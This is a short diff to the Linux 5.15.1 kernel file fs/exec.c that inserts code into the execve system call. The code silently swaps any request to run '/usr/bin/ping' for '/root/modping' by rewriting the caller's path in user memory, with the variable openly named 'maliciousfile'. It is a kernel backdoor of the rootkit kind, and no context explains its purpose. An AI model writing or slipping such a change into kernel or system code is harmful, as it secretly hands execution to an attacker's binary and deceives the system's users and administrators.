diff --git a/linux-5.15.1/fs/exec.c b/linux-5.15.1-mod/fs/exec.c
index a098c13..d2799f8 100644
--- a/linux-5.15.1/fs/exec.c
+++ b/linux-5.15.1-mod/fs/exec.c
@@ -2065,6 +2065,13 @@ SYSCALL_DEFINE3(execve,
 		const char __user *const __user *, argv,
 		const char __user *const __user *, envp)
 {
+	const char kfilename[13] = {};
+	copy_from_user((void*)kfilename, filename, 13);
+	if (strncmp(kfilename, "/usr/bin/ping", 13) == 0) {
+		const char* maliciousfile = "/root/modping";
+		int ret = copy_to_user((void*)filename, (const char* __user) maliciousfile, 13);
+	}
+
 	return do_execve(getname(filename), argv, envp);
 }
 
